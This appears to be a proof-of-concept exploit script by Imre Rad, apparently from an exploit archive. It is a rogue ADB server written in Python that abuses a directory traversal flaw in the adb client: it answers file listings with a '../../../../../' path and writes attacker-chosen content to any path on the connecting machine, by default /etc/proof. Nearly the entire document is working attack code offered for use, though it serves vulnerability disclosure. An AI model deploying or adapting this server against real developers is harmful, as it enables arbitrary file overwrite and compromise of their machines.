README.md
Rendering markdown...
#!/usr/bin/env python3
# This is a dummy, syncronous ADB server written in pure Python by Imre Rad.
# The tool demonstrates a directory traversal vulnerability in the adb implementation.
import os
import sys
import socketserver
import argparse
import unittest
import struct
from collections import namedtuple
LISTEN_PORT = 5555
DESTINATION_PATH = "/etc/proof"
CONTENT = "hello world"
CMD_CNXN = "CNXN"
CMD_OPEN = "OPEN"
CMD_WRTE = "WRTE"
CMD_CLSE = "CLSE"
CMD_OKAY = "OKAY"
Channel = namedtuple("Channel", ["local", "remote", "handler"])
trace_mode = os.getenv("TRACE")
debug_mode = os.getenv("DEBUG")
def calc_adb_checksum(payload : bytes):
sum = 0
for b in payload:
sum = (sum + b) & 0xffffffff
return sum
class Tests(unittest.TestCase):
def test_checksum(self):
ls = bytes("a" * 10000000, "utf-8")
c = calc_adb_checksum(ls)
self.assertEqual(c, 0x39d10680)
def eprint(*args, **kwargs):
print(*args, **kwargs, file=sys.stderr)
def tprint(*args, **kwargs):
if not trace_mode:
return
eprint(*args, **kwargs)
def dprint(*args, **kwargs):
if not debug_mode:
return
eprint(*args, **kwargs)
def myrecv(socket):
r = socket.recv(1024)
tprint("raw recv:", r)
return r
def mysend(socket, payload):
tprint("raw send:", payload)
return socket.sendall(payload)
class AdbHandler(socketserver.BaseRequestHandler):
# this is a map from local to remote channel ids
last_channel_id = 0
channels = {}
def _recv(self):
return myrecv(self.request)
def _send(self, payload):
return mysend(self.request, payload)
def adbsend(self, cmd : str, arg0, arg1, payload = b""):
cmd_bytes = cmd.encode("utf-8")
cmd_int = struct.unpack("I", cmd_bytes)[0]
magic_int = cmd_int ^ 0xffffffff
magic_bytes = struct.pack("I", magic_int)
checksum_int = calc_adb_checksum(payload)
checksum_bytes = struct.pack("I", checksum_int)
arg0_bytes = struct.pack("I", arg0)
arg1_bytes = struct.pack("I", arg1)
length_bytes = struct.pack("I", len(payload))
dprint("send", "cmd:", cmd, "arg0:", arg0, "arg1:", arg1, "payload length:", len(payload), "payload:", payload)
full = cmd_bytes + arg0_bytes + arg1_bytes + length_bytes + checksum_bytes + magic_bytes + payload
return self._send(full)
def handle(self):
r = b""
while True:
a = self._recv()
if not a:
return # EOF
r += a
if len(r) < 24:
raise ValueError("Unexpectedly short message")
while len(r) > 0:
command_str = r[0:4].decode("utf-8")
arg0 = struct.unpack("I", r[4:8])[0]
arg1 = struct.unpack("I", r[8:12])[0]
plen = struct.unpack("I", r[12:16])[0]
if len(r) < 24+plen:
break # need to read more
payload = r[24:24+plen]
r = r[24+plen:]
dprint("recv", "cmd:", command_str, "arg0:", arg0, "arg1:", arg1, "payload length:", len(payload), "payload:", payload)
handler_str = "h_"+command_str
if not hasattr(self, handler_str):
raise ValueError("Unsupported message: "+command_str)
getattr(self, handler_str)(arg0, arg1, payload)
# reading the initial banner of the client (CNXN ...)
def h_CNXN(self, arg0, arg1, payload):
# 00 00 00 01 00 00 04 00
return self.adbsend(CMD_CNXN, 0x01000000, 0x00040000, b"device::ro.product.name=sdk_phone_x86;ro.product.model=Android SDK built for x86;ro.product.device=generic_x86;\x00")
def h_OPEN(self, arg0, arg1, payload):
payload_str = payload.decode("utf-8").rstrip('\x00')
if payload_str != "sync:":
raise ValueError("Unsupported service request "+payload_str.encode("utf-8").hex())
# the pull cmd is opening a sync service
self.last_channel_id += 1
remote_channel_id = arg0
local_channel_id = self.last_channel_id
self.channels[remote_channel_id] = Channel(local_channel_id, remote_channel_id, self.service_sync)
self.adbsend(CMD_OKAY, self.last_channel_id, arg0)
def h_WRTE(self, arg0, arg1, payload):
ch = self.channels.get(arg0)
if not ch:
raise ValueError("Client attempted to write to a channel that does not exist", arg0, arg1)
# we always acknowledge with an OKAY packet, then comes with the service level response
return self.adbsend(CMD_OKAY, ch.local, ch.remote) or \
ch.handler(arg0, arg1, payload)
def h_OKAY(self, arg0, arg1, payload):
# we just swallow
pass
def h_CLSE(self, arg0, arg1, payload):
tprint("CLSE", arg0, arg1, self.channels)
self.channels.pop(arg1, None)
def service_sync(self, local_channel_id, remote_channel_id, payload):
command_str = payload[0:4].decode("utf-8")
rest = payload[4:]
handler_str = "s_sync_"+command_str
if not hasattr(self, handler_str):
raise ValueError("Unsupported sync service message: "+command_str)
getattr(self, handler_str)(local_channel_id, remote_channel_id, rest)
def s_sync_LIST(self, local_channel_id, remote_channel_id, payload):
# adb is asking whether the thing is is about to pull is a directory or a file. We always report a directory no matter what it wants.
filename = "../../../../../" + self.server.args.destination_path
filename_bytes = filename.encode("utf-8")
length_bytes = struct.pack("I", len(filename_bytes))
list_rogue = b"DENT" + bytes.fromhex("b6 81 00 00 04 00 00 00 36 8d c9 61") + length_bytes + filename_bytes
list_done = b"DONE\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
return self.adbsend(CMD_WRTE, remote_channel_id, local_channel_id, list_rogue + list_done)
def s_sync_STAT(self, local_channel_id, remote_channel_id, payload):
self.adbsend(CMD_WRTE, remote_channel_id, local_channel_id, bytes.fromhex("53 54 41 54 ff 41 00 00 00 10 00 00 36 8d c9 61"))
def s_sync_RECV(self, local_channel_id, remote_channel_id, payload):
requested_filename = payload[4:].decode("utf-8")
if not ".." in requested_filename:
raise ValueError("Attack failed; the client is requesting a file we did not expect")
print("Attack worked, client is requesting the file with .. in the name!") # goes to stdout to distinguish this from protocol level noise
content_length = len(self.server.args.content)
content_length_bytes = struct.pack("I", content_length)
content_bytes = self.server.args.content.encode("utf-8")
return self.adbsend(CMD_WRTE, remote_channel_id, local_channel_id, b"DATA" + content_length_bytes) or \
self.adbsend(CMD_WRTE, remote_channel_id, local_channel_id, content_bytes + b"DONE\x00\x00\x00\x00")
def s_sync_QUIT(self, local_channel_id, remote_channel_id, payload):
return self.adbsend(CMD_CLSE, remote_channel_id, local_channel_id)
if __name__ == "__main__":
if os.getenv("TEST"):
unittest.main()
sys.exit(0)
parser = argparse.ArgumentParser()
parser.add_argument("-lp", "--listen-port", type=int, default=LISTEN_PORT, help="The listening port")
parser.add_argument("-dp", "--destination-path", default=DESTINATION_PATH, help="The path to drop the payload on the adb client")
parser.add_argument("-c", "--content", default=CONTENT, help="The content to send to --destination-path")
args = parser.parse_args()
socketserver.TCPServer.allow_reuse_address = True
with socketserver.TCPServer(("0.0.0.0", args.listen_port), AdbHandler) as t:
t.args = args
t.serve_forever()